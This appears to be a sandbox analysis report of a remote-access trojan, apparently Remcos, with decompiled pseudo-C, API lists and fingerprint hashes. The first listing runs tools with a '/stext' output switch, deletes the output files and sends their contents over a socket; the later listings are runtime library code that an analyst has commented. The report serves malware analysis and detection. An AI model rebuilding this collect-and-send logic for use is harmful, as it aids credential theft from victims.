                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401F95( &_a76);
                    				_t225 = E0041432B(E00401EEB(E004030A6(_t224,  &_v324, E00404429(_t137,  &_v348, E00404405(_t137,  &_v372,  &_v988, _t405, E0040427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401F95( &_a100);
                    				_v7 = E0041432B(E00401EEB(E004030A6(_t225,  &_v84, E00404429(_t225,  &_v108, E00404405(_t225,  &_v132,  &_v988, _t405, E0040427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				_t399 =  ==  ? 1 : 0;
                    				if(_t225 == 0) {
                    					_t399 = _t399 + 1;
                    				}
                    				if(_v7 == 0) {
                    					_t399 = _t399 + 1;
                    				}
                    				_t226 = DeleteFileW;
                    				_t394 = 0;
                    				L5:
                    				L5:
                    				if(E004179DC(E00401EEB( &_v228),  &_v300) != 0) {
                    					_v12 = 1;
                    					DeleteFileW(E00401EEB( &_v228));
                    				}
                    				if(E004179DC(E00401EEB( &_v204),  &_v276) != 0) {
                    					_v5 = 1;
                    					DeleteFileW(E00401EEB( &_v204));
                    				}
                    				if(E004179DC(E00401EEB( &_v180),  &_v252) != 0) {
                    					_v6 = 1;
                    					DeleteFileW(E00401EEB( &_v180));
                    				}
                    				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
                    					goto L14;
                    				}
                    				L15:
                    				_t173 = E00405A6F("0");
                    				_t418 = _t173;
                    				if(_t173 == 0) {
                    					E00402F93(_t226, _t402 - 0x18, E00402F93(_t226,  &_v156, E00402F93(_t226,  &_v132, E00402F93(_t226,  &_v108, E00402F93(_t226,  &_v84, E00402FB7( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
                    					_push(0x6a);
                    					E00404AA4(_t226, 0x46c650, _t180, __eflags);
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    				} else {
                    					_t199 = E00417226(_t226,  &_v324, _t399);
                    					E00402F1D(_t402 - 0x18, E00402F93(_t226,  &_v156, E00402F93(_t226,  &_v132, E00402F93(_t226,  &_v108, E00402F93(_t226,  &_v84, E00402F93(_t226,  &_v60, E00402F93(_t226,  &_v372, E00402FB7( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
                    					_push(0x69);
                    					E00404AA4(_t226, 0x46c650, _t207, _t418);
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    				}
                    				E00401FC7();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				E00401FC7();
                    				return E00401FC7();
                    				L14:
                    				Sleep(0x1f4);
                    				_t394 = _t394 + 1;
                    				if(_t394 < 0xa) {
                    					goto L5;
                    				}
                    				goto L15;
			}

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                      • Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
                    • Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                    • String ID: /stext "
                    • API String ID: 1351907930-3856184850
                    • Opcode ID: 9ba4e5789f2cd1714cad2277aa3e4156a6b68364b5e6912a30b3d844b7ed40a9
                    • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                    • Opcode Fuzzy Hash: 9ba4e5789f2cd1714cad2277aa3e4156a6b68364b5e6912a30b3d844b7ed40a9
                    • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E105D3AFC(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				char _v52;
                    				int _v56;
                    				int _v60;
                    				signed int _v100;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v356;
                    				char _v360;
                    				void* __ebp;
                    				signed int _t65;
                    				signed int _t72;
                    				signed int _t78;
                    				signed int _t85;
                    				signed int _t89;
                    				signed int _t91;
                    				long _t93;
                    				signed int* _t96;
                    				signed int _t99;
                    				signed int _t102;
                    				signed int _t106;
                    				void* _t113;
                    				signed int _t116;
                    				void* _t117;
                    				void* _t119;
                    				void* _t120;
                    				void* _t122;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int* _t128;
                    				signed int _t129;
                    				void* _t132;
                    				void* _t134;
                    				signed int _t135;
                    				signed int _t137;
                    				void* _t140;
                    				intOrPtr _t141;
                    				void* _t143;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t158;
                    				signed int _t161;
                    				intOrPtr* _t166;
                    				signed int _t167;
                    				intOrPtr* _t168;
                    				void* _t169;
                    				void* _t171;
                    				signed int _t172;
                    				int _t176;
                    				signed int _t178;
                    				char** _t179;
                    				signed int _t183;
                    				signed int _t184;
                    				void* _t191;
                    				signed int _t192;
                    				void* _t193;
                    				signed int _t194;
                    
                    				_t178 = __esi;
                    				_t171 = __edi;
                    				_t65 = E105D373B();
                    				_v8 = _v8 & 0x00000000;
                    				_t137 = _t65;
                    				_v16 = _v16 & 0x00000000;
                    				_v12 = _t137;
                    				if(E105D3799( &_v8) != 0 || E105D3741( &_v16) != 0) {
                    					L46:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E105C77F8();
                    					asm("int3");
                    					_t191 = _t193;
                    					_t194 = _t193 - 0x10;
                    					_push(_t137);
                    					_t179 = E105D373B();
                    					_v52 = 0;
                    					_v56 = 0;
                    					_v60 = 0;
                    					_t72 = E105D3799( &_v52);
                    					_t143 = _t178;
                    					__eflags = _t72;
                    					if(_t72 != 0) {
                    						L66:
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						E105C77F8();
                    						asm("int3");
                    						_push(_t191);
                    						_t192 = _t194;
                    						_v100 =  *0x46a00c ^ _t192;
                    						 *0x46a344 =  *0x46a344 | 0xffffffff;
                    						 *0x46a338 =  *0x46a338 | 0xffffffff;
                    						_push(0);
                    						_push(_t179);
                    						_push(_t171);
                    						_t172 = 0;
                    						 *0x46b748 = 0;
                    						_t78 = E105CA703(__eflags,  &_v360,  &_v356, 0x100, 0x45913c);
                    						__eflags = _t78;
                    						if(_t78 != 0) {
                    							__eflags = _t78 - 0x22;
                    							if(_t78 == 0x22) {
                    								_t184 = E105D07FA(_t143, _v276);
                    								__eflags = _t184;
                    								if(__eflags != 0) {
                    									_t85 = E105CA703(__eflags,  &_v280, _t184, _v276, 0x45913c);
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E105D1063(0);
                    										_t172 = _t184;
                    									} else {
                    										_push(_t184);
                    										goto L72;
                    									}
                    								} else {
                    									_push(0);
                    									L72:
                    									E105D1063();
                    								}
                    							}
                    						} else {
                    							_t172 =  &_v272;
                    						}
                    						asm("sbb esi, esi");
                    						_t183 =  ~(_t172 -  &_v272) & _t172;
                    						__eflags = _t172;
                    						if(_t172 == 0) {
                    							L80:
                    							L47();
                    						} else {
                    							__eflags =  *_t172;
                    							if(__eflags == 0) {
                    								goto L80;
                    							} else {
                    								_push(_t172);
                    								E105D3AFC(0x45913c, _t172, _t183, __eflags);
                    							}
                    						}
                    						E105D1063(_t183);
                    						__eflags = _v16 ^ _t192;
                    						return E105C0B89(_v16 ^ _t192);
                    					} else {
                    						_t89 = E105D3741( &_v16);
                    						_pop(_t143);
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L66;
                    						} else {
                    							_t91 = E105D376D( &_v20);
                    							_pop(_t143);
                    							__eflags = _t91;
                    							if(_t91 != 0) {
                    								goto L66;
                    							} else {
                    								E105D1063( *0x46b740);
                    								 *0x46b740 = 0;
                    								 *_t194 = 0x46b750;
                    								_t93 = GetTimeZoneInformation(??);
                    								__eflags = _t93 - 0xffffffff;
                    								if(_t93 != 0xffffffff) {
                    									_t150 =  *0x46b750 * 0x3c;
                    									_t167 =  *0x46b7a4;
                    									_push(_t171);
                    									 *0x46b748 = 1;
                    									_v12 = _t150;
                    									__eflags =  *0x46b796;
                    									if( *0x46b796 != 0) {
                    										_t151 = _t150 + _t167 * 0x3c;
                    										__eflags = _t151;
                    										_v12 = _t151;
                    									}
                    									__eflags =  *0x46b7ea;
                    									if( *0x46b7ea == 0) {
                    										L56:
                    										_v16 = 0;
                    										_v20 = 0;
                    									} else {
                    										_t106 =  *0x46b7f8;
                    										__eflags = _t106;
                    										if(_t106 == 0) {
                    											goto L56;
                    										} else {
                    											_v16 = 1;
                    											_v20 = (_t106 - _t167) * 0x3c;
                    										}
                    									}
                    									_t176 = E105D03C9(0, _t167);
                    									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										L60:
                    										 *( *_t179) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L60;
                    										} else {
                    											( *_t179)[0x3f] = 0;
                    										}
                    									}
                    									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                    									__eflags = _t102;
                    									if(_t102 == 0) {
                    										L64:
                    										 *(_t179[1]) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L64;
                    										} else {
                    											_t179[1][0x3f] = 0;
                    										}
                    									}
                    								}
                    								 *(E105D3735()) = _v12;
                    								 *((intOrPtr*)(E105D3729())) = _v16;
                    								_t96 = E105D372F();
                    								 *_t96 = _v20;
                    								return _t96;
                    							}
                    						}
                    					}
                    				} else {
                    					_t168 =  *0x46b740;
                    					_t178 = _a4;
                    					if(_t168 == 0) {
                    						L12:
                    						E105D1063(_t168);
                    						_t154 = _t178;
                    						_t12 = _t154 + 1; // 0x105d3eed
                    						_t169 = _t12;
                    						do {
                    							_t113 =  *_t154;
                    							_t154 = _t154 + 1;
                    						} while (_t113 != 0);
                    						_t13 = _t154 - _t169 + 1; // 0x105d3eee
                    						 *0x46b740 = E105D07FA(_t154 - _t169, _t13);
                    						_t116 = E105D1063(0);
                    						_t170 =  *0x46b740;
                    						if( *0x46b740 == 0) {
                    							goto L45;
                    						} else {
                    							_t158 = _t178;
                    							_push(_t171);
                    							_t14 = _t158 + 1; // 0x105d3eed
                    							_t171 = _t14;
                    							do {
                    								_t117 =  *_t158;
                    								_t158 = _t158 + 1;
                    							} while (_t117 != 0);
                    							_t15 = _t158 - _t171 + 1; // 0x105d3eee
                    							_t119 = E105D2784(_t170, _t15, _t178);
                    							_t193 = _t193 + 0xc;
                    							if(_t119 == 0) {
                    								_t171 = 3;
                    								_push(_t171);
                    								_t120 = E105DE177(_t159,  *_t137, 0x40, _t178);
                    								_t193 = _t193 + 0x10;
                    								if(_t120 == 0) {
                    									while( *_t178 != 0) {
                    										_t178 = _t178 + 1;
                    										_t171 = _t171 - 1;
                    										if(_t171 != 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_pop(_t171);
                    									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                    									if(_t137 != 0) {
                    										_t178 = _t178 + 1;
                    									}
                    									_t161 = E105C75D7(_t159, _t178) * 0xe10;
                    									_v8 = _t161;
                    									while(1) {
                    										_t122 =  *_t178;
                    										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                    											break;
                    										}
                    										_t178 = _t178 + 1;
                    									}
                    									__eflags =  *_t178 - 0x3a;
                    									if( *_t178 == 0x3a) {
                    										_t178 = _t178 + 1;
                    										_t161 = _v8 + E105C75D7(_t161, _t178) * 0x3c;
                    										_v8 = _t161;
                    										while(1) {
                    											_t132 =  *_t178;
                    											__eflags = _t132 - 0x30;
                    											if(_t132 < 0x30) {
                    												break;
                    											}
                    											__eflags = _t132 - 0x39;
                    											if(_t132 <= 0x39) {
                    												_t178 = _t178 + 1;
                    												__eflags = _t178;
                    												continue;
                    											}
                    											break;
                    										}
                    										__eflags =  *_t178 - 0x3a;
                    										if( *_t178 == 0x3a) {
                    											_t178 = _t178 + 1;
                    											_t161 = _v8 + E105C75D7(_t161, _t178);
                    											_v8 = _t161;
                    											while(1) {
                    												_t134 =  *_t178;
                    												__eflags = _t134 - 0x30;
                    												if(_t134 < 0x30) {
                    													goto L38;
                    												}
                    												__eflags = _t134 - 0x39;
                    												if(_t134 <= 0x39) {
                    													_t178 = _t178 + 1;
                    													__eflags = _t178;
                    													continue;
                    												}
                    												goto L38;
                    											}
                    										}
                    									}
                    									L38:
                    									__eflags = _t137;
                    									if(_t137 != 0) {
                    										_v8 = _t161;
                    									}
                    									__eflags =  *_t178;
                    									_t124 = 0 |  *_t178 != 0x00000000;
                    									_v16 = _t124;
                    									__eflags = _t124;
                    									_t125 = _v12;
                    									if(_t124 == 0) {
                    										_t29 = _t125 + 4; // 0xfffffddd
                    										 *((char*)( *_t29)) = 0;
                    										L44:
                    										 *(E105D3735()) = _v8;
                    										_t128 = E105D3729();
                    										 *_t128 = _v16;
                    										return _t128;
                    									}
                    									_push(3);
                    									_t28 = _t125 + 4; // 0xfffffddd
                    									_t129 = E105DE177(_t161,  *_t28, 0x40, _t178);
                    									_t193 = _t193 + 0x10;
                    									__eflags = _t129;
                    									if(_t129 == 0) {
                    										goto L44;
                    									}
                    								}
                    							}
                    							goto L46;
                    						}
                    					} else {
                    						_t166 = _t168;
                    						_t135 = _t178;
                    						while(1) {
                    							_t140 =  *_t135;
                    							if(_t140 !=  *_t166) {
                    								break;
                    							}
                    							if(_t140 == 0) {
                    								L8:
                    								_t116 = 0;
                    							} else {
                    								_t9 = _t135 + 1; // 0xdde805eb
                    								_t141 =  *_t9;
                    								_t10 = _t166 + 1; // 0x0
                    								if(_t141 !=  *_t10) {
                    									break;
                    								} else {
                    									_t135 = _t135 + 2;
                    									_t166 = _t166 + 2;
                    									if(_t141 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							if(_t116 == 0) {
                    								L45:
                    								return _t116;
                    							} else {
                    								_t137 = _v12;
                    								goto L12;
                    							}
                    							goto L82;
                    						}
                    						asm("sbb eax, eax");
                    						_t116 = _t135 | 0x00000001;
                    						__eflags = _t116;
                    						goto L10;
                    					}
                    				}
                    				L82:
                    			}


                    APIs
                    • _free.LIBCMT ref: 105D3B7E
                    • _free.LIBCMT ref: 105D3BA2
                    • _free.LIBCMT ref: 105D3D29
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 105D3D3B
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 105D3DB3
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 105D3DE0
                    • _free.LIBCMT ref: 105D3EF5
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    • API String ID: 314583886-0
                    • Opcode ID: bb1c4e29ea3c94fde807ef6c64449600ee68293c17ee249133bd8b76597d27cb
                    • Instruction ID: 2176ff76737f19d9f8c78926c456d7d053a40a1df018bbfacce2256aea4c8541
                    • Opcode Fuzzy Hash: bb1c4e29ea3c94fde807ef6c64449600ee68293c17ee249133bd8b76597d27cb
                    • Instruction Fuzzy Hash: 79C128B5900345AFD700DF6DCC45A9ABFB9EF81290F1485ABE490E73A2E7309E41CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00448CA5(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t53;
                    				void _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				signed int _t64;
                    				char _t92;
                    				char _t100;
                    				void* _t101;
                    				signed int _t104;
                    				void* _t107;
                    				void* _t121;
                    				char* _t123;
                    				signed int _t127;
                    				intOrPtr* _t132;
                    				void* _t133;
                    				intOrPtr* _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				signed int _t137;
                    				signed int _t138;
                    				char* _t139;
                    
                    				_t121 = __edx;
                    				_t100 = _a4;
                    				_v28 = _t100;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                    					_v16 = 1;
                    					_t53 = E0043F348(_t101, 1, 0x50);
                    					_v8 = _t53;
                    					if(_t53 != 0) {
                    						_t104 = 0x14;
                    						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                    						_t132 = E0043F98C(0, 4);
                    						_t127 = 0;
                    						_v12 = _t132;
                    						E004401F5(0);
                    						_pop(_t107);
                    						if(_t132 != 0) {
                    							 *_t132 = 0;
                    							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                    								_t133 = _v8;
                    								_t57 =  *0x46a188; // 0x46a180
                    								 *_t133 = _t57;
                    								_t58 =  *0x46a18c; // 0x46b64c
                    								 *((intOrPtr*)(_t133 + 4)) = _t58;
                    								_t59 =  *0x46a190; // 0x46b64c
                    								 *((intOrPtr*)(_t133 + 8)) = _t59;
                    								_t60 =  *0x46a1b8; // 0x46a184
                    								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                    								_t61 =  *0x46a1bc; // 0x46b650
                    								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                    								L19:
                    								 *_v12 = 1;
                    								if(_t127 != 0) {
                    									 *_t127 = 1;
                    								}
                    								goto L21;
                    							}
                    							_t134 = E0043F98C(_t107, 4);
                    							_v20 = _t134;
                    							E004401F5(0);
                    							if(_t134 == 0) {
                    								L11:
                    								E004401F5(_v8);
                    								E004401F5(_v12);
                    								return _v16;
                    							}
                    							 *_t134 = 0;
                    							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                    							// Five locale-info lookups for the locale at _t100+0xb0 via E0044B0F4 (a GetLocaleInfo-style wrapper, inferred from
                    							// its LCTYPE arguments): 0xe = LOCALE_SDECIMAL, 0xf = LOCALE_STHOUSAND, 0x10 = LOCALE_SGROUPING. Results go into the
                    							// lconv-shaped block at _v8 (decimal_point +0, thousands_sep +4, grouping +8); the two calls flagged 2 fill the
                    							// wide-character copies at +0x30/+0x34. Failures are OR-ed together so any error takes the cleanup path below.
                    							_t135 = E0044B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                    							_t136 = _t135 | E0044B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                    							_v16 = _v8 + 8;
                    							_t137 = _t136 | E0044B0F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                    							_t138 = _t137 | E0044B0F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                    							if((E0044B0F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                    								_t123 =  *_v16;
                    								// Convert the LOCALE_SGROUPING string (e.g. "3;0") in place into the byte form the CRT's lconv.grouping uses:
                    								// each ASCII digit becomes its numeric value and every ';' is deleted by shifting the rest of the string left.
                    								while( *_t123 != 0) {
                    									_t92 =  *_t123;
                    									if(_t92 < 0x30 || _t92 > 0x39) {
                    										if(_t92 != 0x3b) {
                    											goto L16;
                    										}
                    										_t139 = _t123;
                    										do {
                    											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                    											_t139 = _t139 + 1;
                    										} while ( *_t139 != 0);
                    									} else {
                    										 *_t123 = _t92 - 0x30;
                    										L16:
                    										_t123 = _t123 + 1;
                    									}
                    								}
                    								_t127 = _v20;
                    								_t133 = _v8;
                    								goto L19;
                    							}
                    							E00448C3C(_v8);
                    							_v16 = _v16 | 0xffffffff;
                    							goto L11;
                    						}
                    						E004401F5(_v8);
                    						return 1;
                    					}
                    					return 1;
                    				} else {
                    					_t127 = 0;
                    					_v12 = 0;
                    					_t133 = 0x46a188;
                    					L21:
                    					_t64 =  *(_t100 + 0x80);
                    					// Swap the new numeric info into the locale record: +0x7c and +0x80 point to the two reference counts allocated
                    					// above (E0043F98C(.., 4), set to 1 at L19), +0x88 to the block itself. The old counts are decremented with
                    					// interlocked ops and, when the one at +0x7c reaches zero, the old count and block are freed. The
                    					// `(_t64 | 0xffffffff) == 0` test is the decompiler's rendering of the lock xadd result check.
                    					if(_t64 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t64 | 0xffffffff) == 0) {
                    							E004401F5( *((intOrPtr*)(_t100 + 0x7c)));
                    							E004401F5( *(_t100 + 0x88));
                    						}
                    					}
                    					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                    					 *(_t100 + 0x80) = _t127;
                    					 *(_t100 + 0x88) = _t133;
                    					return 0;
                    				}
                    			}
                    Instruction address column for the listing above (one entry per statement, flattened by extraction): 0x00448ca5 to 0x00448eb9 in the 0x00400000 image; 0x00000000 entries are the decompiler's goto lines, which have no instruction of their own.

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: d6a22768136e8f975915bec0fd0b09f4a3547930ba585ec064c42673eecca047
                    • Instruction ID: 5037293de4a8d99413730c47bb2bf79aa549f16360774897cc4c3b668a0cb580
                    • Opcode Fuzzy Hash: d6a22768136e8f975915bec0fd0b09f4a3547930ba585ec064c42673eecca047
                    • Instruction Fuzzy Hash: DE61C171900205EFEB20DF69C841BAEBBF4EF45710F24416FEA54EB241EB749D418B99
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			// Statically linked CRT code, not Remcos-specific logic: E00442E63 rebuilds the CRT timezone state (the globals
                    			// reached through E004428C7/E004428BB/E004428C1: timezone offset, daylight flag, DST bias, plus the two zone-name
                    			// strings) from GetTimeZoneInformation. The decompiler has run it together with the routine after the error stub
                    			// at 0x00442fb3, which consults the TZ environment variable first and only falls back to this one.
                    			E00442E63(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				signed int _v56;
                    				char _v268;
                    				intOrPtr _v272;
                    				char _v276;
                    				char _v312;
                    				char _v316;
                    				void* __ebp;
                    				void* _t36;
                    				signed int _t38;
                    				signed int _t42;
                    				signed int _t50;
                    				void* _t54;
                    				void* _t56;
                    				signed int* _t61;
                    				intOrPtr _t71;
                    				void* _t78;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t89;
                    				int _t93;
                    				char** _t96;
                    				signed int _t100;
                    				signed int _t101;
                    				signed int _t106;
                    				signed int _t107;
                    				intOrPtr _t116;
                    				intOrPtr _t118;
                    
                    				_t88 = __edi;
                    				_t96 = E004428CD();
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				_t36 = E0044292B( &_v8);
                    				_pop(_t78);
                    				if(_t36 != 0) {
                    					L19:
                    					// Error stub: five zero arguments to E0043698A, the shape of the CRT's _invalid_parameter call, which does not return.
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043698A();
                    					// The int3 is padding between functions; from here on the decompiler has appended the next routine.
                    					asm("int3");
                    					_t106 = _t107;
                    					_t38 =  *0x46a00c; // 0xee31ea10, the stack cookie (checked before return through E0042FD1B)
                    					_v56 = _t38 ^ _t106;
                    					 *0x46a344 =  *0x46a344 | 0xffffffff;
                    					 *0x46a338 =  *0x46a338 | 0xffffffff;
                    					_push(0);
                    					_push(_t96);
                    					_t77 = "TZ";
                    					_t89 = 0;
                    					 *0x46b748 = 0;
                    					// Read the TZ environment variable into the 0x100-byte stack buffer (a getenv_s-style call: the required
                    					// size comes back in _v272).
                    					_t42 = E00439895(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                    					__eflags = _t42;
                    					if(_t42 != 0) {
                    						__eflags = _t42 - 0x22;
                    						// 0x22 is ERANGE: the value did not fit, so allocate the required size and read it again.
                    						if(_t42 == 0x22) {
                    							_t101 = E0043F98C(_t78, _v272);
                    							__eflags = _t101;
                    							if(__eflags != 0) {
                    								_t50 = E00439895(__eflags,  &_v276, _t101, _v272, _t77);
                    								__eflags = _t50;
                    								if(_t50 == 0) {
                    									E004401F5(0);
                    									_t89 = _t101;
                    								} else {
                    									_push(_t101);
                    									goto L25;
                    								}
                    							} else {
                    								_push(0);
                    								L25:
                    								E004401F5();
                    							}
                    						}
                    					} else {
                    						_t89 =  &_v268;
                    					}
                    					asm("sbb esi, esi");
                    					// _t100 is the heap copy of TZ if one was allocated (pointer differs from the stack buffer), otherwise 0; freed below.
                    					_t100 =  ~(_t89 -  &_v268) & _t89;
                    					__eflags = _t89;
                    					if(__eflags == 0) {
                    						L33:
                    						// TZ unset or empty: take the timezone from the OS via the GetTimeZoneInformation routine above.
                    						E00442E63(_t77, _t89, _t100, __eflags);
                    					} else {
                    						__eflags =  *_t89;
                    						if(__eflags == 0) {
                    							goto L33;
                    						} else {
                    							_push(_t89);
                    							E00442C8E(_t77, _t89, _t100, __eflags);
                    						}
                    					}
                    					E004401F5(_t100);
                    					__eflags = _v12 ^ _t106;
                    					return E0042FD1B(_v12 ^ _t106);
                    				} else {
                    					_t54 = E004428D3( &_v12);
                    					_pop(_t78);
                    					if(_t54 != 0) {
                    						goto L19;
                    					} else {
                    						_t56 = E004428FF( &_v16);
                    						_pop(_t78);
                    						if(_t56 != 0) {
                    							goto L19;
                    						} else {
                    							E004401F5( *0x46b740);
                    							 *0x46b740 = 0;
                    							// GetTimeZoneInformation fills the static TIME_ZONE_INFORMATION at 0x46b750 (its pointer is the argument the
                    							// decompiler shows as ??). The absolute addresses below are its fields: Bias 0x46b750, StandardName 0x46b754,
                    							// StandardDate.wMonth 0x46b796, StandardBias 0x46b7a4, DaylightName 0x46b7a8, DaylightDate.wMonth 0x46b7ea,
                    							// DaylightBias 0x46b7f8.
                    							 *_t107 = 0x46b750;
                    							if(GetTimeZoneInformation(??) != 0xffffffff) {
                    								_t85 =  *0x46b750 * 0x3c; // Bias, minutes to seconds
                    								_t87 =  *0x46b7a4; // 0x0 (StandardBias)
                    								_push(__edi);
                    								 *0x46b748 = 1;
                    								_v8 = _t85;
                    								_t116 =  *0x46b796; // 0x0 (StandardDate.wMonth)
                    								if(_t116 != 0) {
                    									_v8 = _t85 + _t87 * 0x3c; // timezone offset = (Bias + StandardBias) * 60
                    								}
                    								_t118 =  *0x46b7ea; // 0x0 (DaylightDate.wMonth)
                    								if(_t118 == 0) {
                    									L9:
                    									_v12 = 0; // no daylight saving
                    									_v16 = 0;
                    								} else {
                    									_t71 =  *0x46b7f8; // 0x0 (DaylightBias)
                    									if(_t71 == 0) {
                    										goto L9;
                    									} else {
                    										_v12 = 1; // daylight flag
                    										_v16 = (_t71 - _t87) * 0x3c; // DST bias = (DaylightBias - StandardBias) * 60
                    									}
                    								}
                    								// Copy StandardName and DaylightName into the two name buffers at *_t96 (at most 0x3f characters, terminator
                    								// written below). If the conversion fails or needed a default character (_v20 set), the name is emptied.
                    								_t93 = E0043F55B(0, _t87);
